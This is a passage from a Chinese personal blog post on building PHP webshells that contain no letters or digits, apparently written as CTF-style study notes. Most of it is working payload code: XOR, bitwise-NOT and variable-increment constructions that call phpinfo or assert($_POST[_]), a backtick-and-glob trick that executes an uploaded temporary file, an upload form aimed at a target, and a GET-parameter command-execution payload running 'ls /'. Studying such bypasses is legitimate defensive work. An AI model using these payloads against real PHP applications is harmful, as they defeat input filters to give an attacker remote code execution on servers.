class="variable">$num</span>++)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">for</span>(<span class="variable">$x</span>=<span class="number">33</span>;<span class="variable">$x</span>&lt;<span class="number">126</span>;<span class="variable">$x</span>++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span>(judge(chr(<span class="variable">$x</span>)))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">for</span>(<span class="variable">$y</span>=<span class="number">33</span>;<span class="variable">$y</span>&lt;=<span class="number">126</span>;<span class="variable">$y</span>++)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span>(judge(chr(<span class="variable">$y</span>)))</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="variable">$f</span> = chr(<span class="variable">$x</span>)^chr(<span class="variable">$y</span>);</span><br><span class="line">                    <span class="keyword">if</span>(<span class="variable">$f</span> == <span class="variable">$shell</span>[<span class="variable">$num</span>])</span><br><span class="line">                    &#123;</span><br><span class="line">                        <span class="variable">$result1</span> .= chr(<span class="variable">$x</span>);</span><br><span class="line">                        <span class="variable">$result2</span> .= chr(<span class="variable">$y</span>);</span><br><span class="line">                        <span class="keyword">break</span> <span class="number">2</span>;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//echo $result1;</span></span><br><span class="line"><span class="comment">//echo &quot;\n&quot;;</span></span><br><span class="line"><span class="comment">//echo $result2;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">judge</span>(<span class="params"><span class="variable">$c</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/[a-z0-9]/is&#x27;</span>,<span class="variable">$c</span>))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$payload</span> = <span class="string">&#x27;$&#123;&quot;&#x27;</span>.<span class="variable">$result1</span>.<span class="string">&#x27;&quot;^&quot;&#x27;</span>.<span class="variable">$result2</span>.<span class="string">&#x27;&quot;&#125;&#123;_&#125;();&amp;_=phpinfo&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$payload</span>;</span><br><span class="line"><span class="comment">//$&#123;&quot;!&#x27;%(&quot;^&quot;~``|&quot;&#125;&#123;_&#125;();&amp;_=phpinfo</span></span><br></pre></td></tr></table></figure>



<h4 id="取反绕过"><a href="#取反绕过" class="headerlink" title="取反绕过:"></a>取反绕过:</h4><p>​        取反的符号是<code>~</code>，在数值的二进制表示方式上，将0变为1，将1变为0</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##构造phpinfo();</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span>=<span class="string">&#x27;phpinfo&#x27;</span>;</span><br><span class="line"><span class="variable">$b</span>=~<span class="variable">$a</span>;</span><br><span class="line"><span class="comment">//	$b=urlencode($b);</span></span><br><span class="line"><span class="comment">// 	%8F%97%8F%96%91%99%90</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$b</span>;</span><br><span class="line"><span class="comment">//payload:$_=~%8F%97%8F%96%91%99%90;$_();</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219121335447.png">可以看到输出为乱码，所以为了识别，这里对取反结果进行url编码</p>
<p>​        <img src="/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219135203835.png"></p>
<p>​        借着P牛的文章打了波Payload，就一起写了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$__</span>=(<span class="string">&#x27;&gt;&#x27;</span>&gt;<span class="string">&#x27;&lt;&#x27;</span>)+(<span class="string">&#x27;&gt;&#x27;</span>&gt;<span class="string">&#x27;&lt;&#x27;</span>);<span class="variable">$_</span>=<span class="variable">$__</span>/<span class="variable">$__</span>;<span class="variable">$____</span>=<span class="string">&#x27;&#x27;</span>;<span class="variable">$___</span>=<span class="string">&quot;瞰&quot;</span>;<span class="variable">$____</span>.=~(<span class="variable">$___</span>&#123;<span class="variable">$_</span>&#125;);<span class="variable">$___</span>=<span class="string">&quot;和&quot;</span>;<span class="variable">$____</span>.=~(<span class="variable">$___</span>&#123;<span class="variable">$__</span>&#125;);<span class="variable">$___</span>=<span class="string">&quot;和&quot;</span>;<span class="variable">$____</span>.=~(<span class="variable">$___</span>&#123;<span class="variable">$__</span>&#125;);<span class="variable">$___</span>=<span class="string">&quot;的&quot;</span>;<span class="variable">$____</span>.=~(<span class="variable">$___</span>&#123;<span class="variable">$_</span>&#125;);<span class="variable">$___</span>=<span class="string">&quot;半&quot;</span>;<span class="variable">$____</span>.=~(<span class="variable">$___</span>&#123;<span class="variable">$_</span>&#125;);<span class="variable">$___</span>=<span class="string">&quot;始&quot;</span>;<span class="variable">$____</span>.=~(<span class="variable">$___</span>&#123;<span class="variable">$__</span>&#125;);<span class="variable">$_____</span>=<span class="string">&#x27;_&#x27;</span>;<span class="variable">$___</span>=<span class="string">&quot;俯&quot;</span>;<span class="variable">$_____</span>.=~(<span class="variable">$___</span>&#123;<span class="variable">$__</span>&#125;);<span class="variable">$___</span>=<span class="string">&quot;瞰&quot;</span>;<span class="variable">$_____</span>.=~(<span class="variable">$___</span>&#123;<span class="variable">$__</span>&#125;);<span class="variable">$___</span>=<span class="string">&quot;次&quot;</span>;<span class="variable">$_____</span>.=~(<span class="variable">$___</span>&#123;<span class="variable">$_</span>&#125;);<span class="variable">$___</span>=<span class="string">&quot;站&quot;</span>;<span class="variable">$_____</span>.=~(<span class="variable">$___</span>&#123;<span class="variable">$_</span>&#125;);<span class="variable">$_</span>=<span class="variable">$$_____</span>;<span class="variable">$____</span>(<span class="variable">$_</span>[<span class="variable">$__</span>]);</span><br><span class="line"><span class="comment">/**唯一需要注意的点，是在url请求中对payload进行urlencode编码</span></span><br><span class="line"><span class="comment">利用PHP的弱类型特性，因为要获取&#x27;和&#x27;&#123;2&#125;，就必须有数字2。而PHP由于弱类型这个特性，true的值为1，故true+true==2，也就是(&#x27;&gt;&#x27;&gt;&#x27;&lt;&#x27;)+(&#x27;&gt;&#x27;&gt;&#x27;&lt;&#x27;)==2</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219171822116.png"></p>
<p>​    还有一种不使用位运算就可以构造Shell的方法，即找到一个字符变量，借助PHP里变量的自增，获得a-z中的所有字符，因为PHP函数大小写不敏感，所以最终执行ASSERT($<em>POST[\</em>])</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$_</span>=[];</span><br><span class="line"><span class="variable">$_</span>=@<span class="string">&quot;<span class="subst">$_</span>&quot;</span>; <span class="comment">// $_=&#x27;Array&#x27;;</span></span><br><span class="line"><span class="variable">$_</span>=<span class="variable">$_</span>[<span class="string">&#x27;!&#x27;</span>==<span class="string">&#x27;@&#x27;</span>]; <span class="comment">// $_=$_[0];</span></span><br><span class="line"><span class="variable">$___</span>=<span class="variable">$_</span>; <span class="comment">// A</span></span><br><span class="line"><span class="variable">$__</span>=<span class="variable">$_</span>;</span><br><span class="line"><span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;</span><br><span class="line"><span class="variable">$___</span>.=<span class="variable">$__</span>; <span class="comment">// S</span></span><br><span class="line"><span class="variable">$___</span>.=<span class="variable">$__</span>; <span class="comment">// S</span></span><br><span class="line"><span class="variable">$__</span>=<span class="variable">$_</span>;</span><br><span class="line"><span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++; <span class="comment">// E </span></span><br><span class="line"><span class="variable">$___</span>.=<span class="variable">$__</span>;</span><br><span class="line"><span class="variable">$__</span>=<span class="variable">$_</span>;</span><br><span class="line"><span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++; <span class="comment">// R</span></span><br><span class="line"><span class="variable">$___</span>.=<span class="variable">$__</span>;</span><br><span class="line"><span class="variable">$__</span>=<span class="variable">$_</span>;</span><br><span class="line"><span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++; <span class="comment">// T</span></span><br><span class="line"><span class="variable">$___</span>.=<span class="variable">$__</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$____</span>=<span class="string">&#x27;_&#x27;</span>;</span><br><span class="line"><span class="variable">$__</span>=<span class="variable">$_</span>;</span><br><span class="line"><span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++; <span class="comment">// P</span></span><br><span class="line"><span class="variable">$____</span>.=<span class="variable">$__</span>;</span><br><span class="line"><span class="variable">$__</span>=<span class="variable">$_</span>;</span><br><span class="line"><span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++; <span class="comment">// O</span></span><br><span class="line"><span class="variable">$____</span>.=<span class="variable">$__</span>;</span><br><span class="line"><span class="variable">$__</span>=<span class="variable">$_</span>;</span><br><span class="line"><span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++; <span class="comment">// S</span></span><br><span class="line"><span class="variable">$____</span>.=<span class="variable">$__</span>;</span><br><span class="line"><span class="variable">$__</span>=<span class="variable">$_</span>;</span><br><span class="line"><span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++; <span class="comment">// T</span></span><br><span class="line"><span class="variable">$____</span>.=<span class="variable">$__</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$_</span>=<span class="variable">$$____</span>;</span><br><span class="line"><span class="variable">$___</span>(<span class="variable">$_</span>[_]); <span class="comment">// ASSERT($_POST[_]);</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">$_=[];$_=@&quot;$_&quot;;$_=$_[&#x27;!&#x27;==&#x27;@&#x27;];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____=&#x27;_&#x27;;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);</span></span><br><span class="line"><span class="comment">payload:对以上内容进行urlencode编码</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219175011538.png"></p>
<h4 id="过滤-、-、-："><a href="#过滤-、-、-：" class="headerlink" title="过滤$、_、()："></a>过滤$、_、()：</h4><h5 id="PHP7版本："><a href="#PHP7版本：" class="headerlink" title="PHP7版本："></a>PHP7版本：</h5><p>​        PHP7前是不允许用<code>($a)();</code>这样的方法来执行动态函数的，但PHP7中增加了对此的支持。所以，可以通过<code>(&#39;phpinfo&#39;)();</code>来执行函数，第一个括号中可以是任意PHP表达式</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(~%<span class="number">8</span>F%<span class="number">97</span>%<span class="number">8</span>F%<span class="number">96</span>%<span class="number">91</span>%<span class="number">99</span>%<span class="number">90</span>)();		<span class="comment">//(phpinfo)();</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219154318018.png"></p>
<h5 id="PHP5版本："><a href="#PHP5版本：" class="headerlink" title="PHP5版本："></a>PHP5版本：</h5><p>​        “反引号”就是PHP中最简单的执行shell的方法，由于反引号不属于字母、数字，所以可以执行系统命令</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#总结P牛文章里的几个Linux shell的知识点</span></span><br><span class="line"><span class="number">1</span>、shell下可以利用.来执行任意脚本</span><br><span class="line"><span class="number">2</span>、发送一个上传文件的POST包，此时PHP会将我们上传的文件保存在临时文件夹下，默认的文件名是/tmp/phpXXXXXX，文件名最后<span class="number">6</span>个字符是随机的大小写字母    </span><br><span class="line"><span class="number">3</span>、Linux文件名支持用glob通配符代替</span><br><span class="line"><span class="number">4</span>、*可以代替<span class="number">0</span>个及以上任意字符；?可以代表<span class="number">1</span>个任意字符</span><br><span class="line"><span class="number">5</span>、glob支持用[^x]的方法来构造“这个位置不是字符x”</span><br><span class="line"><span class="comment"># example: 				. /???/????????[@-[]</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#payload:</span></span><br><span class="line"><span class="meta">?&gt;</span><span class="meta">&lt;?=</span>`.+/???/????????[@-[]`;<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>​        构造上传表单：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">#1.html</span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">title</span>&gt;</span>Document<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;http://ip:port/where&#x27;s_the_dir/shell.php?shell=?&gt;&lt;?=`.+/???/????????[@-[]`;?&gt;&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span> <span class="attr">enctype</span>=<span class="string">&quot;multipart/form-data&quot;</span>&gt;</span>   </span><br><span class="line">  <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;file&quot;</span> <span class="attr">name</span>=<span class="string">&quot;file&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;提交&quot;</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#5.txt</span></span><br><span class="line"><span class="comment">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line">whoami</span><br></pre></td></tr></table></figure>

<p>​        考虑到多次上传的可能性，这里有概率匹配不到目标文件，如果发现没有结果可以尝试多刷新几次。</p>
<p><img src="/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219165241124.png">        </p>
<p>​        更快捷的方式：shell命令执行，前提是没过滤$符</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">?&gt;</span><span class="meta">&lt;?=</span>`&#123;$&#123;~<span class="string">&quot;%a0%b8%ba%ab&quot;</span>&#125;[%a0]&#125;`<span class="meta">?&gt;</span>&amp;%a0=ls /.</span><br><span class="line"><span class="comment">#	?\&gt;闭合了eval自带的&lt;?标签，使用短标签，&#123;&#125;包含的PHP代码可以被执行#~&quot;%a0%b8%ba%ab&quot;为&quot;_GET&quot;，通过反引号进行shell命令执行。最后只要GET传参%a0即可执行命令</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219150351565.png"></p>
<h4 id="小结："><a href="#小结：" class="headerlink" title="小结："></a>小结：</h4><p>​        对PHP版本的一些特征不明确，就比如：PHP5和PHP7里对assert是作为函数名动态执行，还是类似于eval的语言结构，怎么去定义语言结构、几个版本之间的差异是目前可以去看的。看下来货很多，通过这种绕过技巧去做一些PHP的混淆、借此对一些命令注入的题目进行魔改……个人觉得都不失为很优秀的选择。</p>
<p>参考文章：</p>
<p>​    <a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html">https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html</a></p>
<p>​    <a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html">https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html</a></p>
<p>​    <a target="_blank" rel="noopener" href="https://www.cnblogs.com/v01cano/p/11736722.html">https://www.cnblogs.com/v01cano/p/11736722.html</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/" data-id="ckivlx50q000258we4nfka12e" data-title="无字符数字Webshell" class="article-share-link">分享</a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/" rel="tag">奇技淫巧</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2020/12/16/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">后一篇</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/" rel="tag">奇技淫巧</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/" style="font-size: 10px;">奇技淫巧</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/12/">十二月 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/">无字符数字Webshell</a>
          </li>
        
          <li>
            <a href="/2020/12/16/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2020 LeEas1na<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>